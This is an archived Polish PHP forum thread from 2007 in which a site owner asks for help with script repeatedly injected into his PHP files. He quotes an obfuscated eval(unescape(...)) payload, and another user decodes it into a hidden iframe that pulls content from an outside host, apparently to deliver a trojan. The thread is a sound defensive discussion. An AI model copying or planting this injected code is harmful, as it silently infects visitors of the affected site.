Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Skrypt ladujacy strone w pliku[php]
Forum PHP.pl > Forum > PHP
ManiQu
16.10.2007, 19:09:42
Witam.
W kilku plikach pojawilo mi sie cos takiego:
Kod
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%32%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%34%34%39%29%2b%27%31%61%32%62%5c%27%20%77%69%64%74%68%3d%38%37%20%68%65%69%67%68%74%3d%33%32%37%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Ładuje prawdopodobnie trojana. Bo mi zawsze wykrywa go avast. Trojan jest uczepliwy. Ciezko usunac. Moze ktos obczaic jaka to strona?
Pozdrawiam
P.S. gdy usune to z pliku za kilka dni znowu sie pojawia. Tylko ja mam dostep do ftp. Jakis hacker moze to zrobic?
michu2510
16.10.2007, 19:14:19
to oznacza to :
Kod
window.status='Done';document.write('<iframe name=42 src=\'http://alltraff.ru/lol.php?'+Math.round(Math.random()*28449)+'1a2b\' width=87 height=327 style=\'display: none\'></iframe>')
zmien haslo na ftp
ManiQu
16.10.2007, 19:30:36
Musi byc jakis hacker. Dal to w index.php i login.php tongue.gif
michu2510
16.10.2007, 19:49:16
a podaj adres do strony może jest w niej błąd pozwalający na wejście hakerowi
ManiQu
16.10.2007, 20:44:00
czy moglby ktos podejrzec pliczki? WWW podam na PW.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.